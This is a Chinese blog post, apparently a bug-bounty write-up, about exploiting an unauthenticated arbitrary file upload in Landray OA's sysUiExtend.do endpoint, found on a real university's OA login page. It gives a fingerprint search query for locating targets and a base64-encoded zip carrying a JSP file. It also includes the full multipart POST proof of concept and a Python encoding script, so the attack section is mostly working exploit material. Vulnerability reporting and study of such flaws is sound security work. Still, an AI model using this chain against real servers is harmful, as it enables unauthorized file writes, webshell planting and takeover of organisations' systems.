SRC实战:指纹识别->代码执行

最新推荐文章于 2024-10-06 00:00:00 发布
最新推荐文章于 2024-10-06 00:00:00 发布
阅读量832 收藏 15
点赞数 22
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73648490/article/details/136298527
版权

一.信息收集

搜集语法

app="Landray-OA系统"

注:本文仅做技术假设分享,禁止对外非法渗透,违者后果自负,本人不承担相关法律责任

一.发现目标

今天不小心渗透测试其它目标时点进了北京外国语大学的一个oa登陆界面

看着有点眼熟,于是去识别了一下指纹

image-20240129214615563

蓝凌OA,老熟人,于是我们用一下历史漏洞打一下这个站

二.漏洞验证

验证漏洞是否可以利用,可以访问该接口

https://127.0.0.1/api///sys/ui/sys_ui_extend/sysUiExtend.do?method=upload

image-20240129134804133

页面如下

成功访问

有戏,那我们接着利用一下

三.漏洞利用

构造上传文件,guyue.jsp和ui.ini,然后放在同一个文件夹下打包

image-20240129220633241

然后将压缩包进行base64编码

UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==        

poc如下

POST /api///sys/ui/sys_ui_extend/sysUiExtend.do?method=getThemeInfo HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: multipart/form-data; boundary=---------------------------260140030128010173621878123124
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
 
-----------------------------260140030128010173621878123124
Content-Disposition: form-data; name="file"; filename="guyue.zip"
Content-Type: application/x-zip-compressed
 
{{base64dec(UEsDBBQAAAAIAFh3PVjyEgrVagAAAHQAAAAJAAAAZ3V5dWUuanNwHchBCsIwEAXQveAdYqGQgOQCFZeuRU8wlE8z7TCJcVLx9qV9y3frXW4WS2U1Ud8liORronFBdVP7N8xMuuDShUHxO59mWilyjg8WeCpFeCTjrHGCvUDyJEu+4tPwtf3eqKvAjg4hDK6/b1BLAwQKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAAAHVpLmluaWlkPWd1eXVlDQpuYW1lPWd1eXVlDQp0aHVtYj1ndXl1ZVBLAQI/ABQAAAAIAFh3PVjyEgrVagAAAHQAAAAJACQAAAAAAAAAIAAAAAAAAABndXl1ZS5qc3AKACAAAAAAAAEAGACFTpyagFLaAVLdOrSAUtoBHYjQR31S2gFQSwECPwAKAAAAAABqdz1YCbZnQiEAAAAhAAAABgAkAAAAAAAAACAAAACRAAAAdWkuaW5pCgAgAAAAAAABABgADo27rYBS2gFZ3ATDgFLaARn/z0d9UtoBUEsFBgAAAAACAAIAswAAANYAAAAAAA==)}}
-----------------------------260140030128010173621878123124--

附上编码脚本

import base64
import zipfile
​
zip_file_path = "guyue.zip"
with open(zip_file_path, "rb") as file:
    zip_content = file.read()
base64_encoded = base64.b64encode(zip_content).decode("utf-8")
print(base64_encoded)
​

这里我踩了半个多小时的坑,需要直接将两个文件进行压缩,而不是先压缩成文件夹,再进行压缩

成功访问到我写入的文件路径

image-20240129150429401

image-20240129151034311

四.提交src

教育src点到为止,不要上传马(bushi)

image-20240129214928318

月金剑客
关注
蓝凌OA_sysUiExtend任意文件上传
weixin_43567873的博客
03-06 253
蓝凌OA_sysUiExtend任意文件上传
蓝凌OA sysUiExtend.do 任意文件上传漏洞复现
0xSec
01-25 1979
​ 蓝凌OAsysUiExtend.do接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
我的edu src 挖洞技巧分享
qq_63217130的博客
05-18 1960
本文分享一些在挖edu时候的一些拙见,望各大师傅多多补充
【漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
qq_34914659的博客
06-14 3529
【漏洞复现】 蓝凌OA treexml.tmpl 远程命令执行漏洞
蓝凌OA sysUiComponent 任意文件上传漏洞getshell(文末附批量检测poc)
安于心,修于形
12-26 2208
蓝凌OA sysUiComponent接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
vuInhub靶场实战系列-DC-7实战
weixin_45221204的博客
05-30 871
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-7靶机渗透测试,内容包括nmap扫描、drush密码修改、netcat使用监听任务、反弹shell,定时任务执行backups.sh获得root权限等内容,最终获得flag。使用nmap进行主机发现和端口扫描使用dirbsearch目录扫描尝试登录ssh使用drush修改admin用户的密码登录管理页面安装php模块,编写一句话木马实现反弹shell,获得root权限,最终获得flag。
第76天:Python开发-内外网收集Socket&子域名&DNS1
08-03
- `os_check(url)`:调用NMAP进行OS指纹识别。 **实际应用** 这些技术在网络安全领域有着广泛的应用,例如应急响应时的网络测绘、渗透测试中的信息收集,以及对恶意活动的监控。通过熟练掌握这些技术,安全从业者...
java web指纹采集_Web指纹识别的介绍与编写
weixin_39808893的博客
03-07 1762
一、 前言Web指纹是Web服务组件在开发时留下的对其类型及版本进行标识的特殊信息,包括Web服务器指纹、Web运用指纹以及前端框架指纹等。在Web安全测试过程中,收集Web指纹信息也是一个比较重要的步骤;在安全运营过程中,通过指纹识别识别资产的Web信息,这样能更加了解整个资产存在哪些方面的威胁,然后对症检测修补。网络上开源的Web指纹识别程序很多,如Wappalyzer,Whatweb, wp...
网络安全威胁分析与应对措施:全面提升网络安全防护(附实战案例):识别网络安全威胁,制定有效应对策略
[网络安全威胁分析与应对措施:全面提升网络安全防护(附实战案例):识别网络安全威胁,制定有效应对策略](https://developer.qcloudimg.com/http-save/3264435/99c406c9764c0fdcb3d2172a76d3594a.png) # 1. 网络...
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1106
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
热门推荐
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3422
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
【漏洞复现】蓝凌OA-sysUiExtend-任意文件上传
知黑而守白
01-25 465
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台。蓝凌EIS智慧协同平台 sysUiExtend 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
Burp 指纹识别+OA弱口令爆破-BurpFingerPrint
siu~
04-28 539
BurpSuite插件集成Ehole指纹库并进行常见OA弱口令爆破插件
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 564
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
CSRF 漏洞 - 学习手册
Blue17 の 小窝
10-05 469
CSRF 漏洞从初识到挖掘全流程笔记合集
【隐私计算篇】多方安全计算之函数秘密共享(FSS)
源泉的小广场
10-04 1087
fss、函数秘密共享、函数秘密分享、分布式点函数、DPF、Distributed Point Function、多方安全计算、安全多方计算、MPC、多服务器PIR、SilentOT、PCG for tensor product from LPN and FSS
前置机、跳板机、堡垒机:安全运维领域的“黄金三角”
拉格朗日的学习笔记
09-28 1051
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
Android指纹识别实战:6.0以下系统解决方案
"Android指纹识别功能的深入理解和实战应用,包括6.0以下系统的适配方案。" 在Android应用开发中,指纹识别是一个重要的安全特性,它增强了用户的身份验证过程,提高了应用的安全性。Google从Android 6.0 (API级别...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值